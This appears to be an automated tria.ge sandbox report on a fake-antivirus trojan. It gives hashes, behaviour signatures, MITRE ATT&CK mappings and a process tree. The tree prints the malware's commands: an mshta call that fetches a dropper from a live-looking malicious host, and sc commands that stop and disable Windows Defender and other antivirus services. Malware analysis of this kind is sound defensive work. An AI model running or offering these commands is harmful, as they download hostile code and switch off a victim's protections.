Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

37da1190c3...18.exe

windows7-x64

10

37da1190c3...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    11/07/2024, 05:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    37da1190c300cdb5315dffac45b541dd_JaffaCakes118.exe

  • Size

    2.0MB

  • MD5

    37da1190c300cdb5315dffac45b541dd

  • SHA1

    140ef5a36a7b24ff21800aad7cc28924546ab596

  • SHA256

    e2e5b85381499121ec7e54b810c4415e7d0d4f2f9f1ebcd95c0a8c17db129cce

  • SHA512

    99a8a3aa57df9900314ea732f8bcd597301855c4ad7fd54e0641ebb6cb67b168b5a693cdc6ff54cb7e2fa4fe01e3a69f7e084c0a0a925c78561bf98895144a2f

  • SSDEEP

    49152:D7qDNHm6jMzzCQyKFR3fUZGuZZLhSbaHX4td:DuMXrFRNuZZYi4td

Score
10/10
evasionexecutionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.online-secure-pay.info/?0=154&1=1&2=1&3=25&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=ghnhrhwrll&14=1

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Disables taskbar notifications via registry modification
    evasion
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\37da1190c300cdb5315dffac45b541dd_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\37da1190c300cdb5315dffac45b541dd_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\al6it1516l5754g.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\al6it1516l5754g.exe" -e -p3bl9cj1777w86yj
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\filesystemscan.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\filesystemscan.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Users\Admin\AppData\Roaming\Protector-vqr.exe
          C:\Users\Admin\AppData\Roaming\Protector-vqr.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2604
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.online-secure-pay.info/?0=154&1=1&2=1&3=25&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=ghnhrhwrll&14=1"
            5⤵
            • Modifies Internet Explorer settings
            PID:2696
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            PID:1660
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            PID:2020
          • C:\Windows\SysWOW64\sc.exe
            sc stop msmpsvc
            5⤵
            • Launches sc.exe
            PID:1668
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            5⤵
            • Launches sc.exe
            PID:284
          • C:\Windows\SysWOW64\sc.exe
            sc config ekrn start= disabled
            5⤵
            • Launches sc.exe
            PID:1932
          • C:\Windows\SysWOW64\sc.exe
            sc stop AntiVirService
            5⤵
            • Launches sc.exe
            PID:620
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirService start= disabled
            5⤵
            • Launches sc.exe
            PID:1912
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirSchedulerService start= disabled
            5⤵
            • Launches sc.exe
            PID:1248
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\FILESY~1.EXE" >> NUL
          4⤵
            PID:2640
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:264
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:264 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1032

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    System Services

    2
    T1569

    Service Execution

    2
    T1569.002

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    2
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    5
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Discovery

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Service Stop

    2
    T1489

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      acd29a9a0f0561150fd00459902cc026

      SHA1

      5c466ed1ab8d1d2d751c4f3c05c9a2b83f83fede

      SHA256

      014e74b02cca829c468d981ec8b5eafd17ed8b15c8d99acc9845bceadfd54653

      SHA512

      fa2a65e6655c130951ac0d41fcaa1d2bde8138e4e82d4c1b130b217a26df712c0e33268c8d150a6f8340a6c7214d0f0fc873f4e88cb664e072749c2f22428f23

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      34705d672ae38d2a3e56524e72bdd965

      SHA1

      8a508dfc9714c4eb49ca12546ece17d487c4784f

      SHA256

      68edfe43518c656941ad739bee78d2d70f19fd20149c27ec0da2dec66e227f18

      SHA512

      beb0de2301fb740d13dbaa5921fb60aef4f45bf55580434d4a5a45e39ebfa841f6b6c86323ed5f973b182e561e61f960dd3faf2cb4dfe6873e81a828991d9a85

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      51116634fde5a9553b97d60bfe9925be

      SHA1

      c8a7c6e2cd040c6c9cb20d3b062f79b7607dfd67

      SHA256

      2c865e75cfb3cb45ec96c896012dcb263134acf855d2c5a4e378ecc7e48518c8

      SHA512

      4d66ca348f499ab81f0e150710372c9ee306ccf2708d042f65f20fff9e2f0dff124b47abb8b4a22613b62e7a1746cac409f7195b876945b7d300fa8599d43083

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      9e5134a4c85d41fa6874a28247c0b89e

      SHA1

      c2f97cbc0755ce96c3db064dde338440ee22213c

      SHA256

      9c877ce24542e34f881ddc645682851f41b7398465f5c48fbd7f9fe181e9a564

      SHA512

      e62d1bc5caabcce67f02d8ff216c180cb00a43672bf92bb8dfc55d2a071de57c3631483553839891478a0e4b55143af481580b5ac2fe0524c2ff0846e7f5fc85

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      a245dff41bc6e347799d6c89c5343520

      SHA1

      cd9c9e582a63735173e7c2c6c21522d3b6a82b6d

      SHA256

      77fd80fc5910fa04493bf39f6076531ce5c02fb45d2289b050682af7a670e2ea

      SHA512

      35a12f3a303840ef27c387c06cdaa828dfc42e074ca88e111bac96d33c2c085fa963a04753e813ab03f91826b11a61f425e0586fd363613c42b0fb9b11d45a37

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      1e281b694685f864d22afc02d4bb6b2b

      SHA1

      f9f594f79e66a1942a876a72de4a1da87ffd3d1b

      SHA256

      7bea7ba72c2b23a5710c21716939d7e3e2b83bdad7e0c5efc8fef6d94974c133

      SHA512

      d906ce7d27ae74b7a1ebaaeb9e4afb03846d2c9bf5aa78cd28abd2564d83e729eba7c4dd8bcc23e4ab7b5ca50f4c06c564f6128e6c8e4084709e540bce94eb91

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      85989aa54da0edbdaa51fac8353bf025

      SHA1

      9898537068843686bf0b525b92e2f9cbc7270c80

      SHA256

      423515bab36d965f0aaaa41d6034c0742a6c472284946a1e8e2354a28a66b7fe

      SHA512

      bd343b8a9ead31de4be233e84bafbc874e1a9ada1f864e9b5d87df88690a05f6e351fbe401a52c91c04dd606df25bd0d17f370f6d2d5b45f8e1aefd1bef7d32f

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      38d6be6039edd4200a202ca596047152

      SHA1

      bb6f38143c274c3b354a03905bb43b2e659cea84

      SHA256

      e7702472f391ae3d35e74de873576127c65e282941f1e27776328361196eda94

      SHA512

      7d3935faf884066c96b11d160ffbebc19e29d41f5d9e2f01621bdf34a5b612f48cd82c644937b9cf8124839f38b200b5e1b16f4161b82b02308bc251ba487911

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      60532a6b7168ec1468adaa0b6d577b6b

      SHA1

      b629ad9ebb68a35a190d9863f646ff56b22a8c23

      SHA256

      29b851fee70ee106ef4232c19d0d128bb71e416caf34180d57e5e65d6caa9ebf

      SHA512

      4f5b95c807f76be0d678bc0d2366ded49b0043de1f7d146f26b01eff45199a53c78ed65d719b5e7d51811a55bbfa5a3cc070154adb4fc6543a1cbeaafe10f8b3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab1CC7.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\filesystemscan.exe
      Filesize

      1.9MB

      MD5

      f210c7f3b53f53065a358a300abb7049

      SHA1

      d13adb9cd5a02eb08d8e4c9cce81f6261f1b0294

      SHA256

      a259dc8532b93dca95229d8895ede998f1c3f639b726aa322aa17392f51319f1

      SHA512

      b0b9e0f81b94810f6957c900020504c1089286f0641fcc9d4f3bf385dbe86f7934dfa30e9deb36969dccc002a8ad8ed4b2523713888ccd930dd1e4bc10c8f5a6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar1CC6.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • \Users\Admin\AppData\Local\Temp\RarSFX0\al6it1516l5754g.exe
      Filesize

      2.0MB

      MD5

      260acc7f06f599cdb8773f0ed393be73

      SHA1

      23ccb944535ee07739df656075d6e6790beb6544

      SHA256

      883dd3b1193b371b2ea2751518f0f92943f6ea5bdeb7827d9a8370489e6affda

      SHA512

      5122a4601e9078d2240fe5059d3ed3c2b3ee389c977a894142252cda6b6a5c2c9dc0a0ce23ebf6495471090c6448b42cfb4a1406edde84dea7358bb541d90e40

      Download Submit

    • memory/1896-19-0x0000000003D00000-0x00000000040FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/1896-18-0x0000000003D00000-0x00000000040FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-39-0x0000000005590000-0x00000000055A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2604-40-0x0000000005590000-0x00000000055A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2604-100-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-506-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-62-0x00000000088D0000-0x00000000088D2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2604-501-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-498-0x0000000005590000-0x00000000055A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2604-31-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-67-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2604-497-0x0000000005590000-0x00000000055A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2604-55-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3040-29-0x0000000005900000-0x0000000005CFB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3040-20-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3040-33-0x0000000005900000-0x0000000005CFB000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3040-32-0x0000000000400000-0x00000000007FB000-memory.dmp

      Filesize

      4.0MB

      Download